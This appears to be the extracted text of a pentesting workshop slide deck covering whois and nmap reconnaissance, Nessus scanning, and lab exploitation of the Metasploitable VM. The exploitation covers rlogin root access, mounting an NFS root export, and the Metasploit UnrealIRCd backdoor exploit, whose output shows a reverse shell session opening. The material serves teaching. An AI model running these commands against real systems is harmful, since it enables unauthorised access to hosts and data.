PentestingAn Introduction

Workshop Flow – 1

• Nature of Cyber Security Problem (Slides 4-7)

• Introduction – Pentesting - what, why, how (8-9)

• Pentesting - Intelligence Gathering (10-11)

• Pentesting tools Demo– Kali Linux, NMAP (12)

• Intelligence Gathering using WhoIS (13-15)

• Metasploitable OS – An Introduction (16)

• Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM, Metasploitable VM, Familiarity with Kali Linux, WhoIs

• Intelligence Gathering using NMAP (18-36)• Host Discovery• Port Scanning• OS Detection• Services and Version Detection

• Pentest Lab 1.2 – Intelligence Gathering with NMAP

Workshop Flow - 2

• Vulnerability Analysis (38-39)

• Scanning with Nessus (40-42)

• Understanding Nessus Vulnerability Report (43)

• Understand Vulnerabilties, where do they arise from? (44)

• Exploiting Vulnerabilities – Metasploit and Tools (45-54)• Rlogin• NFS-Share• Metasploit

• Approach to security --- Threat Modelling (55)

• Pentest Lab 1.3• Scanning with Nessus, Analysing the Report• Exploit Vulnerability1, Tools• Exploit Vulnerability2, Tools• Exploit Vulnerability3,4 using Metasploit

Black Hat – White Hat (A Game)

• Securing Our Home – A perspective

Security is Game of Survival

To Survive Deer should run faster than Tiger

To Survive Tiger should run faster than Deer

Physical Security vs Cyber Security

• How similar/ different• Intent

• Nature of the problem• Internet, Global boundaries, Glorified hackers,

Attack tools, Standards, Underworld economy, Accountability, Who is the adversary

• Strategy (attack and defense)• Weakest link strategy, All bases covered

strategy, Insider attack, Policies at different levels etc.

• Are they separate any more?

Spyware

Financial Malware

Security Problem Solving• Security : a Negative Goal.

• Achieve something despite whatever adversary might do. • Positive goal: “Ram can read grades.txt".

• Ask Ram to check that it works. Easy to check • Negative goal: “Shyam cannot read grades.txt".

• Check if Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.

• How might Shyam try to get the contents of grades.txt? Change permissions ,Steal file, Impersonate etc.

• Open Ended Problem. No absolute definitive answer

• Threat Model Concept & Problem Solving

Pentesting – What, Why, How

• Pentesting : An Attack on a system in hopes of finding security weaknesses

• Rationale : Improving the security of your site by breaking into it

• How : Using Attacker’s Techniques

Pentesting – How is it usually done

• Intelligence/ Information Gathering

• Information Analysis and Planning – Component relationships, Target

identification etc

• Vulnerability Detection

• Penetration – Developing/ Customising, Choosing Exploit tools

• Attack/Privilege Escalation

• Analysis and reporting

• Clean-up

Intelligence Gathering

• What are we looking for?• Organizational intelligence, Access point discovery, Network discovery, Infrastructure

fingerprinting

• Open Source Intelligence• Corporate Information :: Location, Org Chart, Document Metadata, Network, Email

Address, Applications used, Purchase Agreements, Defense Technologies Used (Fingerprinting), Financial Information etc

• Individual Information :: All about individual, Social Engineering

• Covert Intelligence : Through Individuals

• Footprinting (next slide)

• Identify Protection Systems (Network, Host, Application, Storage etc)

Intelligence Gathering - Footprinting

• Passive Reconnaisance : Who is lookup, BGP Looking glasses

• Active Footpriting : Port Scanning, Banner Grabbing, SNMP sweeps, DNS Discovery, Forward/ Reverse DNS, Web Application Discovery, Virtual Host Detection

• Establish Target List : Versions, Weak web applications, Patch level

Kali Linux - Demo

A Collection of all Cyber Security related tools

Tools for Information Collection

Some info gathering tools

Some Possible Recon-ng/ Harvester, Maltego, NMAP, Burpsuite, Nessus/ Acunetix

Footprint - First Data

• IP ADDress ( some Ip address in the network to start with )…hunting IP Address

• whois a normally goodplace to start…maltego???...emailID, headers

Whois lookup

• Install it on your linux distro by entering apt-get install whois in terminal

• https://registry.in/whois/nita.ac.in

• Domain Name: NITA.AC.INRegistry Domain ID: D3544155-AFINRegistrar WHOIS Server:Registrar URL: http://www.ernet.inUpdated Date: 2017-03-02T07:21:44ZCreation Date: 2009-04-06T05:03:46ZRegistry Expiry Date: 2019-04-06T05:03:46ZRegistrar Registration Expiration Date:Registrar: ERNET IndiaRegistrar IANA ID: 800068Registrar Abuse Contact Email:Registrar Abuse Contact Phone:Reseller:Domain Status: okRegistrant Organization: National Institute of Technology, AgartalaRegistrant State/Province:Registrant Country: INName Server: ns1.nkn.inName Server: ns2.nkn.inDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of WHOIS database: 2018-06-25T15:58:44Z

http://www.ernet.in/https://registry.in/index.php?query=180.149.63.3&output=nicehttps://registry.in/index.php?query=180.149.63.66&output=nicehttps://www.icann.org/wicf

Whois lookup

• root@kali:~# ping ns1.nkn.inPING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms

--- ns1.nkn.in ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 7715ms

rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms

Metasploitable - Introduction

• An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.

• Used for Labs to exploit

• This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

• Created by the Rapid7 Metasploit team

• Metasploitable login is “msfadmin”; the password is also “msfadmin”

Lab 1.1

• Lab Setup• Virtual Box/ Vmware

• Kali Linux, Metasploitable

• Kali Linux Tools

• Metasploitable

• Testing communication between Kali Linux, Metasploitable server

• Whois

NMAP

• nmap is an open-source port/security scanner

• It’s primary function is the discovery and mapping of hosts on a network

• nmap is consistently voted as one of the most used security tools

• Needs as input a range or some specific address……..

NMAP

• Host Discovery – Identifying computers on a network

• Port Scanning – Enumerating the open ports on one or more target computers

• Version Detection – Interrogating listening network services • listening on remote computers to determine the application name and

version number

• OS Detection – Remotely determining the operating system from network devices

NMAP Demo (Script)

Run nmap command on Kali Linux Terminal.

Sample Syntax:

nmap [ ...] [ ] { }

TARGET SPECIFICATION:

Can pass hostnames, IP addresses, networks, etc.

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

-iL : Input from list of hosts/networks

-iR : Choose random targets

--exclude : Exclude hosts/networks

--excludefile : Exclude list from file

Nmap –v –A …look at the report nmap_report_1.txt in kali linux reports folder

NMAP Host Discovery

• Querying multiple hosts using this method is referred to as ping sweeps …sweep through a range of IP addresses

• The most basic step in mapping out a network.

• Several Sweeps technique• ARP Sweep (default)• ICMP Sweeps• Broadcast ICMP• NON Echo ICMP• TCP sweep• UDP sweep

Host Discovery : ARP Sweep “nmap 10.0.2.0/24 –sn “

Host Discovery : ICMP Sweeps• Used by nmap when router in between (WAN)

• Technique• sending an ICMP ECHO request (ICMP type 8)• If an ICMP ECHO reply (ICMP type 0) is received : target is alive; • No response: target is down

• Pros & Cons• easy to implement• fairly slow, easy to be blocked

Scanner Target

ICMP ECHO request

ICMO ECHO reply

Scanner Target

a host is alive

a host is down/filtered

ICMP ECHO request

No response

Host Discovery : TCP Sweeps

• Sending TCP ACK or TCK SYN packets

• The port number can be selected to avoid blocking by firewall• Usually a good pick would be 21 / 22 / 23 / 25 / 80

• But.. firewalls can spoof a RESET packet for an IP address, so TCP Sweeps may not be reliable.

Host Discovery : UDP Sweeps

• Relies on the ICMP PORT UNREACHABLE

• Assume the port is opened if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram

• Cons:• Routers can drop UDP packets as they cross the Internet

• Many UDP services do not respond when correctly probed

• Firewalls are usually configured to drop UDP packets (except for DNS)

• UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message

NMAP Host Discovery summary• sL: List Scan - simply list targets to scan• -sn: Ping Scan - go no further than determining if host is online• -PN: Treat all hosts as online -- skip host discovery

• -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports• -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes• -PO [protocol list]: IP Protocol Ping

• -n/-R: Never do DNS resolution/Always resolve [default: sometimes]• --dns-servers : Specify custom DNS servers• --system-dns: Use OS's DNS resolver

• -sU: UDP ScanDemo and look at wireshark captureroot@kali:~# nmap -sn 10.0.2.4

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDTNmap scan report for 10.0.2.4Host is up (0.00026s latency).

MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

Port Scanning : TCP Connect Scan• Use basic TCP connection establishment mechanism; complete 3-ways handshake

• Easily to detect by inspecting the system log

• Normally not used since expensive

Scanner Target

SYN

SYN/ACK

ACK

Scanner Target

SYN

RST/ACK

a port is opened

a port is closed

Port Scanning : TCP SYN scan• Do not establish a complete connection (Half Open scanning)

• send a SYN packet and wait for a response• If an SYN/ACK is received=> the port is LISTENING

• immediately tear down the connection by sending a RESET

• If an RST/ACK is received =>a non-LISTENING port. nmap –Pn is Syn scan for all ports

Scanner Target

SYN

SYN/ACK

Scanner Target

SYN

RST/ACK

a port is closed

a port is opened

RST

Port Scanning : Stealth Scan• To gather information about target sites while avoiding

detection • Try to hide themselves among normal network traffic• Not to be logged by logging mechanism (stealth)

• Techniques• Flag Probe packets (Also called “Inverse mapping”)

• Response is sent back only by closed port• By determining what services do not exist, an intruder can infer what

service do exist

• Slow scans rate• difficult to detect =>need long history log

CERT reported this technique in CERT® Incident Note IN-98.04

http://www.cert.org/incident_notes/IN-98.04.html

Port Scanning : Stealth Mapping• RFC793: to handle wrong state packets

• closed ports : reply with a RESET packet to wrong state packets

• opened ports : ignore any packet in question

• Technique

• A RST scan

• A FIN probe with the FIN TCP flag set (eg nmap –sF –p25 and capture)

• An XMAS probe with : set FIN, URG, ACK, SYN, RST, PUSH flags set (eg nmap –sX –p27

Port Scanning with nmap• SCAN TECHNIQUES:

• -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans• -sN/sF/sX: TCP Null, FIN, and Xmas scans• -b : FTP bounce scan

• PORT SPECIFICATION AND SCAN ORDER:• -p : Only scan specified ports

• Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080• -F: Fast mode - Scan fewer ports than the default scan• -r: Scan ports consecutively - don't randomize• --top-ports : Scan most common ports• --port-ratio : Scan ports more common than

Demo : Look at wire shark capture of nmap –sP x.x.x.x ( uses syn scan colorized conversations)nmap -Pn 10.0.2.4Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDTNmap scan report for 10.0.2.4Host is up (0.00037s latency).Not shown: 977 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh23/tcp open telnet

Services and Versions Detection

• The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses

Operating System Detection

• Banner, DNS HINFO and …

• TCP/IP fingerprinting (IP stack implementation will response differently)• FIN probe, Bogus Flag probe

• TCP initial sequence number sampling, TCP initial window, ACK value

• ICMP error quenching, message quoting, ICMP echo integrity

• IP: DF, TOS, Fragmentation

OS Detection : Examples

• ACK : sending FIN|PSH|URG to a closed port• most OS : ACK with the same sequence number

• Windows: ACK with sequence number+1

• Type of Service: Probing with an ICMP_PORT_UNREACHABLE message• most OS : TOS = 0

• Linux : TOS= 0xC0

Version and OS Detection with nmap

• SERVICE/VERSION DETECTION:• -sV: Probe open ports to determine service/version info

• --version-intensity : Set from 0 (light) to 9 (try all probes)

• --version-light: Limit to most likely probes (intensity 2)

• --version-all: Try every single probe (intensity 9)

• --version-trace: Show detailed version scan activity (for debugging)

• OS DETECTION:-O: Enable OS detection--osscan-limit: Limit OS detection to promising targets--osscan-guess: Guess OS more aggressively

Demo -sV and wireshark capture

root@kali:~# nmap -sV 10.0.2.4

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT

Nmap scan report for 10.0.2.4

Host is up (0.00010s latency).

Not shown: 977 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

Lab 1.2

• Workshop Lab Document

Vulnerabilties

• According to Wikipedia;

“The word vulnerability, in computer security, refers to a weakness in a systemallowing an attacker to violate the confidentiality, integrity, availability, access control,consistency or audit mechanisms of the system or the data and applications it hosts”

• To Software Developers, a bug is synonymous to a vulnerability.• Ex: Errors in program’s source code or flawed program design

• Buffer overflows• Memory leaks• Dead locks• Arithmetic overflow• Accessing protected memory (Access Violation)

• Software bug we are speaking of, they are used as the foundation to form an exploit.SecurityAttack on Vulnerability is exploit.

Vulnerabilities

Using Nmap or any scanner Find any hosts worthwhile? Next step should be scanning for exploitable vulnerabilities.

What could be the approach?

• What data do we have till now?

Hosts, Open Ports, Operating System, Applications Running, Versions

• How could we use this data? Use this data to find vulnerabilities using various resources on the net (exploit DB, CVE database, other databases)

Or

• Use a Vulnerability Scanner

Vulnerability Scanner - Nessus

• Nessus is a proprietary vulnerability scanner with Home version free

• Nessus runs a set of exploits on the open ports and reports vulnerabilities

• Vulnerability checks are implemented through plugins. • Plugins are written in Nessus Attack Scripting Language (NASL), a

scripting language optimized for custom network interaction. • New plugins are added as vulnerabilities are discovered. • Many plugins check for a vulnerability by actually exploiting the

vulnerability.• The ‘safe checks’ option specifies that no vulnerability check capable of

crashing a remote host be used (such as DOS attacks).• DEMO…look at Basic scan and Plugins

Vulnerability Scanner - Nessus

• Download Nessus

• On Kali Linux terminal run /etc/init.d/nessusd start

Will get Starting Nessus….

• Go to https://127.0.0.1:8834/#/

Vulnerabilties

Now we know the Vulnerabilities

What’s out Goal with this knowledge?

- Understand where Vulnerabilities arise from (to Prevent in future)

- Understand how exploitations happen (to be able write signatures/ exploit detection)

Understand the vulnerability, categories/ families? (Nessus Families?)

Find a tool to Exploit/ Write an exploit

Metasploit – Rapid7…Demo

Vulnerability – Rlogin ExploitIf we look at Family vertical of Nessus Report, we see some simple ones

- Backdoor

- Gain a shell remotely

- Service Detection – Existence of the service itself indicates vulnerability. Let’s try to exploit “rlogin service detection”

- Click on rlogin Service Detection in nessus report to get details

On Kali Linux Install rsh-client (for rlogin command else it defaults to ssh)

apt-get install rsh-client

rlogin -l root 10.0.2.4Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

Snip….Snip

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have new mail.

root@metasploitable:~#

Vulnerability – NFS Share Exploit

- Let’s try to exploit “nfs exported share information disclosure”- Click on the same in nessus report to get detailsOn Kali Linux Install rpcbind only if you want to recheck if nfs is running), nfs-common

apt-get install rpcbind

apt-get install nfs-common

root@kali:~# showmount -e 10.0.2.4

Export list for 10.0.2.4:

/ *

root@kali:~# mkdir /tmp/r00t

root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/

root@kali:~# ls

amit_passwd Documents Music Pictures Templates Videos

Desktop Downloads 'nmap scan reports' Public trojan.exe

Vulnerabilties – Exploit Payload

• Exploits are commonly used to install system malware or gain system access or recruit client machines into an existing ‘botnet’.

• This is accomplished with the help of a payload

• The payload is a sequence of code that is executed when the vulnerability is triggered

• To make things clear, an Exploit is really broken up into two parts, like so;

EXPLOIT = Vulnerability + Payload;

• Different payload types exist and they accomplish different tasks• exec → Execute a command or program on the remote system• download_exec→ Download a file from a URL and execute• upload_exec→ Upload a local file and execute• adduser → Add user to system accounts

Metasploit Framework

What is the Metasploit Framework?

• According to the Metasploit Team;

“The Metasploit Framework is a platform for writing, testing, and using

exploit code. The primary users of the Framework are professionals

performing penetration testing, shellcode development, and

vulnerability research.”

Metasploit Framework

• The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can provide real damage if not used professionally.

• The fact that MSF is an open-source tool and provides such a simplified method for launching dangerous attacks, it has and still is attracting blackhat and whitehat beginners. Fairly dangerous.

Vulnerabilties –Exploits using Metasploit

db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535

Scans Metsploitable

Vulnerabilties –Exploits using Metasploit

• run the following command:

Services

• Compare

With Nessus

Report

Vulnerabilties –Exploits using Metasploit

Usually the sequence for exploiting is

- Search for the Exploit/ payload using command “search xxx”. Search can be on multiple keywords related to vulnerability eg CVE, module etc

- “use ”

- “Info” to get information on the Exploit

- “run” to execute the exploit

Vulnerabilties – UnrealIRCd Backdoor Detection

- Click on UnrealIRCd Backdoor Detection in Nessus Report

Provides information including CVE No ‘ CVE-2010-2075’

- In Metasploit ‘Search CVE-2010-2075’ givesmsf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution

- ‘Use exploit/unix/irc/unreal_ircd_3281_backdoor ‘ gives cursurmsf exploit(unix/irc/unreal_ircd_3281_backdoor) >

- ‘info’ provides information of payload. RHOST is not set

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075

Vulnerabilties – UnrealIRCd Backdoor Detection

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4

RHOST => 10.0.2.4

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.0.2.15:4444

[*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] 10.0.2.4:6667 - Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo NkKbs49F8lfv25Hf;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "NkKbs49F8lfv25Hf\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400

>>>>>>>.

Security Approach – Threat Modeling

Structured approach to identifying, quantifying, and addressing threats.

In threat modeling, we cover the three main elements:

• Assets: What valuable data and equipment should be secured?

• Threats: What may an attacker do to the system?

• Vulnerabilities: What flaws in the system allow an attacker to realize a threat?

Possible Steps to Threat Modeling

• Identify the Assets

• Describe the Architecture Describe the Architecture

• Break down the Applications

• Identify the Threats

• Document and Classify the Threats

• Rate the Threats

Lab 1.3

Nessus Scan – Metasploitable

Look at Vulnerabilities

2 Vulnerabilities without Metasploit

Metasploit Commands

2 Vulnerabilities with Metasploit